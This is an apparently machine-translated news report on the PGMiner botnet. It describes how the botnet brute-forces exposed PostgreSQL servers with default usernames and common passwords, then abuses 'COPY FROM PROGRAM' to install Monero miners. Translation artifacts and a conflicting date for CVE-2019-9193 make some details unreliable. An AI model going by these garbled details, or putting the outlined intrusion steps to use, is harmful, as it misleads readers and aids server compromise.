Security researchers from Palo Alto networks have discovered a new botnet named pgminer botnet, which targets the PostgreSQL database running on Linux servers to install cryptocurrency miners.
PostgreSQL, also known as PostgreSQL, is one of the most commonly used open source relational database management systems (RDBMS) in production environments. As of November 2020, it ranked fourth among all database management systems (DBMS).
The zombie attacks the PostgreSQL database exposed on the Internet with brute force. It uses the controversial PostgreSQL remote code execution (RCE) flaw to invade the database server. Interestingly, threat actors have begun to weaponize controversial CVEs, not just confirmed CVEs.
“The feature exploited in PostgreSQL is” copy from program “, which was introduced in version 9.3 on September 9, 2013. In 2018, cve-2019-9193 was related to this function and named it “vulnerability”. However, the PostgreSQL community questioned this allocation, and CVE has been marked as “controversial. “This is what Palo Alto networks unit42 has published.
“We believe pgminer is the first cryptocurrency mining botnet delivered through PostgreSQL. “
The attack chain first randomly selects a public network range (such as 22.214.171.124, 126.96.36.199) to attempt to invade the online exposed PostgreSQL server with 5432 ports.
The goal of pgminer botnet is to default the user to “Postgres” and perform brute force attacks on the built-in list of commonly used passwords such as “112233” and “1q2w3e4r” to bypass authentication.
Once the robot accesses the database, it will use the “copy from program” function of PostgreSQL to download and start the coin digging script directly from the underlying server.
The “copy from program” feature has been controversial since its debut in PostgreSQL 9.3. This feature allows local or remote super users to run shell scripts directly on the server, which raises a wide range of security concerns. In 2019, the feature was assigned a cve-2019-9193, named “vulnerability.”. However, the PostgreSQL community challenged this allocation, and the CVE was marked as “disputed.”.
The main argument against defining this feature as a vulnerability is that as long as super user rights are not granted to remote or untrusted users, and the access control and authentication system works well, the function itself does not pose a risk. “Continue to analyze. “On the other hand, security researchers are worried that if an attacker successfully has super user rights by forcing in a password or SQL injection, this feature will indeed make PostgreSQL a stepping stone for remote utilization and code execution, surpassing PostgreSQL software directly on the server’s operating system. “
The pgminer robot then deployed a cryptocurrency monero miner, which was targeted at Linux MIPs, arm and x64 platforms at the time of the report release.
The operator uses a command and control (C2) server hosted on the tor network, and experts point out that the code base for this threat borrows the code from the systemdminer botnet.
Researchers at Palo Alto networks unit42 believe that pgminer may be potentially disruptive due to the popularity of PostgreSQL, warning that the malware can target all major operating systems with extra effort.
Experts have also observed new technologies, such as embedding victim identities in requests, downloading curl binaries in various ways, and impersonating trusted process names.
“PostgreSQL is available for all major platforms, including MacOS, windows, and Linux. In theory, malware actors can implement another version of pgminer for new platforms such as windows and deliver it using PostgreSQL. “The analysis concluded.